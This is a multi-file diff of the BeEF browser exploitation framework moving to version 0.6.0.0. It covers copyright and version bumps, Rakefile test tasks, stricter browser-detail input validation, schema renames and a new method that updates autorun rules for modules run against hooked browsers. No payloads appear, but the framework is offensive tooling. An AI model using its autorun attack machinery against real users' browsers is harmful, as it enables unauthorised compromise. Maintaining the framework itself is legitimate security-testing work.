+* [Ruby](https://www.ruby-lang.org): 3.0 or newer
 * [SQLite](http://sqlite.org): 3.x
 * [Node.js](https://nodejs.org): 10 or newer
 * The gems listed in the Gemfile: https://github.com/beefproject/beef/blob/master/Gemfile

Rakefile

@@ -1,28 +1,27 @@
 #
-# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
-require 'yaml'
-require 'bundler/setup'
-load 'tasks/otr-activerecord.rake'
-#require 'pry-byebug'
-
-
-task :default => ["spec"]
-
-desc 'Generate API documentation to doc/rdocs/index.html'
-task :rdoc do
-  Rake::Task['rdoc:rerdoc'].invoke
-end
-
-## RSPEC
 require 'rspec/core/rake_task'
 
-RSpec::Core::RakeTask.new(:spec) do |task|
+task :default => ["short"]
+
+RSpec::Core::RakeTask.new(:short) do |task|
+  task.rspec_opts = ['--tag ~run_on_browserstack', '--tag ~run_on_long_tests']
+end
+
+RSpec::Core::RakeTask.new(:long) do |task|
   task.rspec_opts = ['--tag ~run_on_browserstack']
 end
 
+RSpec::Core::RakeTask.new(:long_only) do |task|
+  task.rspec_opts = ['--tag ~run_on_browserstack', '--tag run_on_long_tests']
+end
+
+################################
+# Browserstack
+
 RSpec::Core::RakeTask.new(:browserstack) do |task|
   task.rspec_opts = ['--tag run_on_browserstack']
 end
@@ -55,7 +54,7 @@ namespace :ssl do
     end
     Rake::Task['ssl:replace'].invoke
   end
-
+  
   desc 'Re-generate SSL certificate'
   task :replace do
     if File.file?('/usr/local/bin/openssl')
@@ -70,6 +69,14 @@ namespace :ssl do
   end
 end
 
+################################
+# Generate API documentation
+
+desc 'Generate API documentation to doc/rdocs/index.html'
+task :rdoc do
+  Rake::Task['rdoc:rerdoc'].invoke
+end
+
 ################################
 # rdoc
 
@@ -115,7 +122,6 @@ end
 @beef_process_id = nil;
 @beef_config_file = 'tmp/rk_beef_conf.yaml';
 
-
 task :beef_start => 'beef' do
   # read environment param for creds or use bad_fred
   test_user = ENV['TEST_BEEF_USER'] || 'bad_fred'
@@ -190,24 +196,6 @@ file '/tmp/msf-test/msfconsole' do
   sh "cd test;git clone https://github.com/rapid7/metasploit-framework.git /tmp/msf-test"
 end
 
-
-################################
-# Create Mac DMG File
-
-task :dmg do
-  puts "\nCreating Working Directory\n";
-  sh "mkdir dmg";
-  sh "mkdir dmg/BeEF";
-  sh "rsync * dmg/BeEF --exclude=dmg -r";
-  sh "ln -s /Applications dmg/";
-  puts "\nCreating DMG File\n"
-  sh "hdiutil create ./BeEF.dmg -srcfolder dmg -volname BeEF -ov";
-  puts "\nCleaning Up\n"
-  sh "rm -r dmg";
-  puts "\nBeEF.dmg created\n"
-end
-
-
 ################################
 # ActiveRecord
 namespace :db do

VERSION

@@ -1,7 +1,7 @@
 #
-# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 
-0.5.4.0
+0.6.0.0

beef

@@ -1,8 +1,8 @@
 #!/usr/bin/env ruby
 
 #
-# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 
@@ -12,9 +12,9 @@
 $VERBOSE = nil
 
 #
-# @note Version check to ensure BeEF is running Ruby 2.7+
+# @note Version check to ensure BeEF is running Ruby 3.0+
 #
-min_ruby_version = '2.7'
+min_ruby_version = '3.0'
 if RUBY_VERSION < min_ruby_version
   puts
   puts "Ruby version #{RUBY_VERSION} is no longer supported. Please upgrade to Ruby version #{min_ruby_version} or later."
@@ -39,6 +39,10 @@ $root_dir = File.join(File.expand_path(File.dirname(File.realpath(__FILE__))), '
 $:.unshift($root_dir)
 $home_dir = File.expand_path("#{Dir.home}/.beef/", __FILE__).freeze
 
+# @note Parse BeEF CLI options early (prevents Rack help from taking over)
+require 'core/main/console/commandline'
+BeEF::Core::Console::CommandLine.parse
+
 #
 # @note Require core loader
 #
@@ -194,7 +198,6 @@ end
 
 # Connect to DB
 ActiveRecord::Base.logger = nil
-OTR::ActiveRecord.migrations_paths = [File.join('core', 'main', 'ar-migrations')]
 OTR::ActiveRecord.configure_from_hash!(adapter:'sqlite3', database:db_file)
 # otr-activerecord require you to manually establish the connection with the following line
 #Also a check to confirm that the correct Gem version is installed to require it, likely easier for old systems.
@@ -203,10 +206,13 @@ if Gem.loaded_specs['otr-activerecord'].version > Gem::Version.create('1.4.2')
 end
 
 # Migrate (if required)
-context = ActiveRecord::Migration.new.migration_context
+ActiveRecord::Migration.verbose = false # silence activerecord migration stdout messages
+ActiveRecord::Migrator.migrations_paths = [File.join('core', 'main', 'ar-migrations')]
+context = ActiveRecord::MigrationContext.new(ActiveRecord::Migrator.migrations_paths)
 if context.needs_migration?
-  ActiveRecord::Migrator.new(:up, context.migrations, context.schema_migration).migrate
+  ActiveRecord::Migrator.new(:up, context.migrations, context.schema_migration, context.internal_metadata).migrate
 end
+
 #
 # @note Extensions may take a moment to load, thus we print out a please wait message
 #
@@ -242,6 +248,8 @@ BeEF::Core::Console::Banners.print_loaded_extensions
 BeEF::Core::Console::Banners.print_loaded_modules
 BeEF::Core::Console::Banners.print_network_interfaces_count
 BeEF::Core::Console::Banners.print_network_interfaces_routes
+BeEF::Core::Console::Banners.print_http_proxy
+BeEF::Core::Console::Banners.print_dns
 
 #
 # @note Prints the API key needed to use the RESTful API

config.yaml

@@ -1,12 +1,12 @@
 #
-# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 # BeEF Configuration file
 
 beef:
-    version: '0.5.4.0'
+    version: '0.6.0.0'
     # More verbose messages (server-side)
     debug: false
     # More verbose messages (client-side)
@@ -146,6 +146,6 @@ beef:
         metasploit:
             enable: false
         social_engineering:
-            enable: true
+            enable: false
         xssrays:
             enable: true

core/api.rb

@@ -1,6 +1,6 @@
 #
-# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 
@@ -29,7 +29,7 @@ module BeEF
       #
       def register(owner, clss, method, params = [])
         unless verify_api_path(clss, method)
-          print_error "API Registrar: Attempted to register non-existant API method #{clss} :#{method}"
+          print_error "API Registrar: Attempted to register non-existent API method #{clss} :#{method}"
           return
         end
 

core/api/extension.rb

@@ -1,6 +1,6 @@
 #
-# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 

core/api/extensions.rb

@@ -1,6 +1,6 @@
 #
-# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF

core/api/main/configuration.rb

@@ -1,6 +1,6 @@
 #
-# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF

core/api/main/migration.rb

@@ -1,6 +1,6 @@
 #
-# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF

core/api/main/network_stack/assethandler.rb

@@ -1,6 +1,6 @@
 #
-# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF

core/api/main/server.rb

@@ -1,6 +1,6 @@
 #
-# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF

core/api/main/server/hook.rb

@@ -1,6 +1,6 @@
 #
-# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF

core/api/module.rb

@@ -1,6 +1,6 @@
 #
-# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF

core/api/modules.rb

@@ -1,6 +1,6 @@
 #
-# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF

core/bootstrap.rb

@@ -1,6 +1,6 @@
 #
-# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF

core/core.rb

@@ -1,6 +1,6 @@
 #
-# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF

core/extension.rb

@@ -1,6 +1,6 @@
 #
-# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF

core/extensions.rb

@@ -1,6 +1,6 @@
 #
-# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF

core/filters.rb

@@ -1,6 +1,6 @@
 #
-# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF

core/filters/base.rb

@@ -1,6 +1,6 @@
 #
-# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF
@@ -187,7 +187,7 @@ module BeEF
     def self.has_valid_browser_details_chars?(str)
       return false unless is_non_empty_string?(str)
 
-      !(str =~ %r{[^\w\d\s()-.,;:_/!\302\256]}).nil?
+      (str =~ %r{[^\w\d\s()-.,;:_/!\302\256]}).nil?
     end
 
     # Check for valid base details characters

core/filters/browser.rb

@@ -1,6 +1,6 @@
 #
-# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF
@@ -8,10 +8,10 @@ module BeEF
     # Check the browser type value - for example, 'FF'
     # @param [String] str String for testing
     # @return [Boolean] If the string has valid browser name characters
-    def self.is_valid_browsername?(str)
+    def self.is_valid_browsername?(str) # rubocop:disable Naming/PredicatePrefix
       return false unless is_non_empty_string?(str)
       return false if str.length > 2
-      return false if has_non_printable_char?(str)
+      return false unless has_valid_browser_details_chars?(str)
 
       true
     end
@@ -19,9 +19,9 @@ module BeEF
     # Check the Operating System name value - for example, 'Windows XP'
     # @param [String] str String for testing
     # @return [Boolean] If the string has valid Operating System name characters
-    def self.is_valid_osname?(str)
+    def self.is_valid_osname?(str) # rubocop:disable Naming/PredicatePrefix
       return false unless is_non_empty_string?(str)
-      return false if has_non_printable_char?(str)
+      return false unless has_valid_browser_details_chars?(str)
       return false if str.length < 2
 
       true
@@ -30,9 +30,9 @@ module BeEF
     # Check the Hardware name value - for example, 'iPhone'
     # @param [String] str String for testing
     # @return [Boolean] If the string has valid Hardware name characters
-    def self.is_valid_hwname?(str)
+    def self.is_valid_hwname?(str) # rubocop:disable Naming/PredicatePrefix
       return false unless is_non_empty_string?(str)
-      return false if has_non_printable_char?(str)
+      return false unless has_valid_browser_details_chars?(str)
       return false if str.length < 2
 
       true
@@ -41,12 +41,12 @@ module BeEF
     # Verify the browser version string is valid
     # @param [String] str String for testing
     # @return [Boolean] If the string has valid browser version characters
-    def self.is_valid_browserversion?(str)
+    def self.is_valid_browserversion?(str) # rubocop:disable Naming/PredicatePrefix
       return false unless is_non_empty_string?(str)
       return false if has_non_printable_char?(str)
       return true if str.eql? 'UNKNOWN'
       return true if str.eql? 'ALL'
-      return false if !nums_only?(str) and !is_valid_float?(str)
+      return false if !nums_only?(str) && !str.match(/\A(0|[1-9][0-9]{0,3})(\.(0|[1-9][0-9]{0,3})){0,3}\z/)
       return false if str.length > 20
 
       true
@@ -55,7 +55,7 @@ module BeEF
     # Verify the os version string is valid
     # @param [String] str String for testing
     # @return [Boolean] If the string has valid os version characters
-    def self.is_valid_osversion?(str)
+    def self.is_valid_osversion?(str) # rubocop:disable Naming/PredicatePrefix
       return false unless is_non_empty_string?(str)
       return false if has_non_printable_char?(str)
       return true if str.eql? 'UNKNOWN'
@@ -69,9 +69,9 @@ module BeEF
     # Verify the browser/UA string is valid
     # @param [String] str String for testing
     # @return [Boolean] If the string has valid browser / ua string characters
-    def self.is_valid_browserstring?(str)
+    def self.is_valid_browserstring?(str) # rubocop:disable Naming/PredicatePrefix
       return false unless is_non_empty_string?(str)
-      return false if has_non_printable_char?(str)
+      return false unless has_valid_browser_details_chars?(str)
       return false if str.length > 300
 
       true
@@ -80,7 +80,7 @@ module BeEF
     # Verify the cookies are valid
     # @param [String] str String for testing
     # @return [Boolean] If the string has valid cookie characters
-    def self.is_valid_cookies?(str)
+    def self.is_valid_cookies?(str) # rubocop:disable Naming/PredicatePrefix
       return false unless is_non_empty_string?(str)
       return false if has_non_printable_char?(str)
       return false if str.length > 2000
@@ -91,9 +91,9 @@ module BeEF
     # Verify the system platform is valid
     # @param [String] str String for testing
     # @return [Boolean] If the string has valid system platform characters
-    def self.is_valid_system_platform?(str)
+    def self.is_valid_system_platform?(str) # rubocop:disable Naming/PredicatePrefix
       return false unless is_non_empty_string?(str)
-      return false if has_non_printable_char?(str)
+      return false unless has_valid_browser_details_chars?(str)
       return false if str.length > 200
 
       true
@@ -102,7 +102,7 @@ module BeEF
     # Verify the date stamp is valid
     # @param [String] str String for testing
     # @return [Boolean] If the string has valid date stamp characters
-    def self.is_valid_date_stamp?(str)
+    def self.is_valid_date_stamp?(str) # rubocop:disable Naming/PredicatePrefix
       return false unless is_non_empty_string?(str)
       return false if has_non_printable_char?(str)
       return false if str.length > 200
@@ -113,7 +113,7 @@ module BeEF
     # Verify the CPU type string is valid
     # @param [String] str String for testing
     # @return [Boolean] If the string has valid CPU type characters
-    def self.is_valid_cpu?(str)
+    def self.is_valid_cpu?(str) # rubocop:disable Naming/PredicatePrefix
       return false unless is_non_empty_string?(str)
       return false if has_non_printable_char?(str)
       return false if str.length > 200
@@ -124,7 +124,7 @@ module BeEF
     # Verify the memory string is valid
     # @param [String] str String for testing
     # @return [Boolean] If the string has valid memory type characters
-    def self.is_valid_memory?(str)
+    def self.is_valid_memory?(str) # rubocop:disable Naming/PredicatePrefix
       return false unless is_non_empty_string?(str)
       return false if has_non_printable_char?(str)
       return false if str.length > 200
@@ -135,7 +135,7 @@ module BeEF
     # Verify the GPU type string is valid
     # @param [String] str String for testing
     # @return [Boolean] If the string has valid GPU type characters
-    def self.is_valid_gpu?(str)
+    def self.is_valid_gpu?(str) # rubocop:disable Naming/PredicatePrefix
       return false unless is_non_empty_string?(str)
       return false if has_non_printable_char?(str)
       return false if str.length > 200
@@ -148,11 +148,11 @@ module BeEF
     # @return [Boolean] If the string has valid browser plugin characters
     # @note This string can be empty if there are no browser plugins
     # @todo Verify if the ruby version statement is still necessary
-    def self.is_valid_browser_plugins?(str)
+    def self.is_valid_browser_plugins?(str) # rubocop:disable Naming/PredicatePrefix
       return false unless is_non_empty_string?(str)
       return false if str.length > 1000
 
-      if str.encoding === Encoding.find('UTF-8')
+      if str.encoding == Encoding.find('UTF-8') # Style/CaseEquality: Avoid the use of the case equality operator `===`.
         (str =~ /[^\w\d\s()-.,';_!\302\256]/u).nil?
       else
         (str =~ /[^\w\d\s()-.,';_!\302\256]/n).nil?

core/filters/command.rb

@@ -1,6 +1,6 @@
 #
-# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF

core/filters/http.rb

@@ -1,6 +1,6 @@
 #
-# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF

core/filters/page.rb

@@ -1,6 +1,6 @@
 #
-# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF

core/hbmanager.rb

@@ -1,6 +1,6 @@
 #
-# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF

core/loader.rb

@@ -1,6 +1,6 @@
 #
-# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 

core/logger.rb

@@ -1,6 +1,6 @@
 #
-# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 

core/main/ar-migrations/015_create_http.rb

@@ -4,8 +4,8 @@ class CreateHttp < ActiveRecord::Migration[6.0]
       t.text :hooked_browser_id
       # The http request to perform. In clear text.
       t.text :request
-      # Boolean value as string to say whether cross-domain requests are allowed
-      t.boolean :allow_cross_domain, default: true
+      # Boolean value as string to say whether cross-origin requests are allowed
+      t.boolean :allow_cross_origin, default: true
       # The http response body received. In clear text.
       t.text :response_data
       # The http response code. Useful to handle cases like 404, 500, 302, ...
@@ -26,7 +26,7 @@ class CreateHttp < ActiveRecord::Migration[6.0]
       t.text :domain
       # The port on which perform the request.
       t.text :port
-      # Boolean value to say if the request was cross-domain
+      # Boolean value to say if the request was cross-origin
       t.text :has_ran, default: 'waiting'
       # The path of the request.
       # Example: /secret.html

core/main/ar-migrations/025_create_xssrays_scan.rb

@@ -5,7 +5,7 @@ class CreateXssraysScan < ActiveRecord::Migration[6.0]
       t.datetime :scan_start
       t.datetime :scan_finish
       t.text :domain
-      t.text :cross_domain
+      t.text :cross_origin
       t.integer :clean_timeout
       t.boolean :is_started
       t.boolean :is_finished

core/main/autorun_engine/engine.rb

@@ -1,6 +1,6 @@
 #
-# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF

core/main/autorun_engine/parser.rb

@@ -1,6 +1,6 @@
 #
-# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF

core/main/autorun_engine/rule_loader.rb

@@ -1,6 +1,6 @@
 #
-# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF
@@ -105,6 +105,99 @@ module BeEF
           { 'success' => false, 'error' => e.message }
         end
 
+        # Update an ARE rule set.
+        # @param [Hash] ARE rule ID.
+        # @param [Hash] ARE ruleset as JSON
+        # @return [Hash] {"success": Boolean, "rule_id": Integer, "error": String}
+        def update_rule_json(id, data)
+          # Quite similar in implementation to load_rule_json. Might benefit from a refactor.
+          name = data['name'] || ''
+          author = data['author'] || ''
+          browser = data['browser'] || 'ALL'
+          browser_version = data['browser_version'] || 'ALL'
+          os = data['os'] || 'ALL'
+          os_version = data['os_version'] || 'ALL'
+          modules = data['modules']
+          execution_order = data['execution_order']
+          execution_delay = data['execution_delay']
+          chain_mode = data['chain_mode'] || 'sequential'
+
+          begin
+            BeEF::Core::AutorunEngine::Parser.instance.parse(
+              name,
+              author,
+              browser,
+              browser_version,
+              os,
+              os_version,
+              modules,
+              execution_order,
+              execution_delay,
+              chain_mode
+            )
+          rescue => e
+            print_error("[ARE] Error updating ruleset (#{name}): #{e.message}")
+            return { 'success' => false, 'error' => e.message }
+          end
+
+          existing_rule = BeEF::Core::Models::Rule.where(
+            name: name,
+            author: author,
+            browser: browser,
+            browser_version: browser_version,
+            os: os,
+            os_version: os_version,
+            modules: modules.to_json,
+            execution_order: execution_order.to_s,
+            execution_delay: execution_delay.to_s,
+            chain_mode: chain_mode
+          ).first
+
+          unless existing_rule.nil?
+            msg = "Duplicate rule already exists in the database (ID: #{existing_rule.id})"
+            print_info("[ARE] Skipping ruleset (#{name}): #{msg}")
+            return { 'success' => false, 'error' => msg }
+          end
+          old_are_rule = BeEF::Core::Models::Rule.find_by(id: id)
+
+          old_are_rule.update(
+            name: name,
+            author: author,
+            browser: browser,
+            browser_version: browser_version,
+            os: os,
+            os_version: os_version,
+            modules: modules.to_json,
+            execution_order: execution_order.to_s,
+            execution_delay: execution_delay.to_s,
+            chain_mode: chain_mode
+          )
+
+          print_info("[ARE] Ruleset (#{name}) updated successfully.")
+
+          if @debug_on
+            print_more "Target Browser: #{browser} (#{browser_version})"
+            print_more "Target OS: #{os} (#{os_version})"
+            print_more 'Modules to run:'
+            modules.each do |mod|
+              print_more "(*) Name: #{mod['name']}"
+              print_more "(*) Condition: #{mod['condition']}"
+              print_more "(*) Code: #{mod['code']}"
+              print_more '(*) Options:'
+              mod['options'].each do |key, value|
+                print_more "\t#{key}: (#{value})"
+              end
+            end
+            print_more "Exec order: #{execution_order}"
+            print_more "Exec delay: #{exec_delay}"
+          end
+
+          { 'success' => true }
+        rescue TypeError, ArgumentError => e
+          print_error("[ARE] Failed to update ruleset (#{name}): #{e.message}")
+          { 'success' => false, 'error' => e.message }
+        end
+
         # Load an ARE ruleset from file
         # @param [String] JSON ARE ruleset file path
         def load_rule_file(json_rule_path)

core/main/client/are.js

@@ -1,6 +1,6 @@
 //
-// Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
-// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - https://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
 

core/main/client/beef.js

@@ -1,6 +1,6 @@
 //
-// Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
-// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - https://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
 

core/main/client/browser.js

@@ -1,6 +1,6 @@
 //
-// Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
-// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - https://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
 
@@ -944,14 +944,25 @@ beef.browser = {
      */
     isFF99: function () {
         return !!window.devicePixelRatio && !!window.history.replaceState && (this.getProtocol() == "https:" ? typeof navigator.mozGetUserMedia != "undefined" : true) && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/99./) != null;
+    }, 
+
+    /**
+     * Returns true if the browser is any version of Firefox.
+     * @example: beef.browser.isFFbowser()
+    */
+    isFFbowser: function () {
+        const parser = bowser.getParser(navigator.userAgent);
+        const browserName = parser.getBrowserName();
+        return browserName == 'Firefox';
     },
 
     /**
-     * Returns true if FF.
+     * Returns true if the browser is any version of Firefox.
      * @example: beef.browser.isFF()
      */
     isFF: function () {
-        return this.isFF2() || this.isFF3() || this.isFF3_5() || this.isFF3_6() || this.isFF4() || this.isFF5() || this.isFF6() || this.isFF7() || this.isFF8() || this.isFF9() || this.isFF10() || this.isFF11() || this.isFF12() || this.isFF13() || this.isFF14() || this.isFF15() || this.isFF16() || this.isFF17() || this.isFF18() || this.isFF19() || this.isFF20() || this.isFF21() || this.isFF22() || this.isFF23() || this.isFF24() || this.isFF25() || this.isFF26() || this.isFF27() || this.isFF28() || this.isFF29() || this.isFF30() || this.isFF31() || this.isFF32() || this.isFF33() || this.isFF34() || this.isFF35() || this.isFF36() || this.isFF37() || this.isFF38() || this.isFF39() || this.isFF40() || this.isFF41() || this.isFF42() || this.isFF43() || this.isFF44() || this.isFF45() || this.isFF46() || this.isFF47() || this.isFF48() || this.isFF49() || this.isFF50() || this.isFF51() || this.isFF52() || this.isFF53() || this.isFF54() || this.isFF55() || this.isFF56() || this.isFF57() || this.isFF58()|| this.isFF59() || this.isFF60() || this.isFF61() || this.isFF62() || this.isFF63() || this.isFF64() || this.isFF65() || this.isFF66() || this.isFF67() || this.isFF68() || this.isFF69() || this.isFF70() || this.isFF71() || this.isFF72() || this.isFF73() || this.isFF74() || this.isFF75() || this.isFF76() || this.isFF77() || this.isFF78() || this.isFF79() || this.isFF80() || this.isFF81() || this.isFF82() || this.isFF83() || this.isFF84() || this.isFF85() || this.isFF86() || this.isFF87() || this.isFF88() || this.isFF89() || this.isFF90() || this.isFF91() || this.isFF92() || this.isFF93() || this.isFF94() || this.isFF95() || this.isFF96() || this.isFF97() || this.isFF98() || this.isFF99();
